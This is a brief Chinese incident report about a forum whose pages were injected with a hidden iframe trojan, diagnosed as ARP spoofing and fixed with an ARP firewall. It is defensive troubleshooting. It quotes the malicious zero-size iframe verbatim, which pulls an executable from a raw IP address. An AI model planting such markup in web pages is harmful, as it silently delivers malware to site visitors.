昨日接到某论坛的求助，论坛中被挂iframe木马，当访问论坛时发现每个页面的置顶有个iframe木马，代码如下<iframe src= http://222.113.57.47:369/h.exe width=0 height=0></iframe> 360自动提示有木马，系统会弹出一个载下h.exe的对话框。由于论坛是当天刚出现的情况，服务器中就放置了一个论坛，分析有可能有以下几种情况。

1. 　论坛被攻击
2. 　IIS被置入木马
3. 　ARP攻击

　　针对第一种情况找到论坛中改过的文件与模板，并未发现相关被篡改的内容，第一种情况排除。接下来接以下两种思路来寻找解决方法，在论坛中新建两个文件，一个是1.html、一个是1.php　无需输入内容。通过论坛网址访问　　网址/1.html 访问此页面没发现异常、访问1.php发现被自动挂马，也就是说当运行PHP的文件时会自动挂马，那么IIS被置入木马的可能情就大些，（IIS被置入木马分析：如PHP解析的文件被篡改，也会出现以上的情况）按IIS的配置进行查找也未发现问题。

　　怀疑可能是服务器所在的局域网或网络有ARP攻击，从网上下载一个ARP防火墙后重启服务器，发现问题解决，每个页面中已经没有iframe的木马。访问论坛首页和原建立的1.php页面也已正常。但访问论坛子页时360仍提示有木马，但子页的代码已无iframe的内容。这种情况可能是论坛访问过大，多用户同时访问子页，360有云计算会将原有木马的网站或页面自动提交到云服务器中，以致及时清除木马后360的云服务器还没有反映过来才出现的误报情况。

　 在些易天科技提示服务器管理员除作好站点的安全防范外，应对服务器作相关的安全设置。安装必要的软件。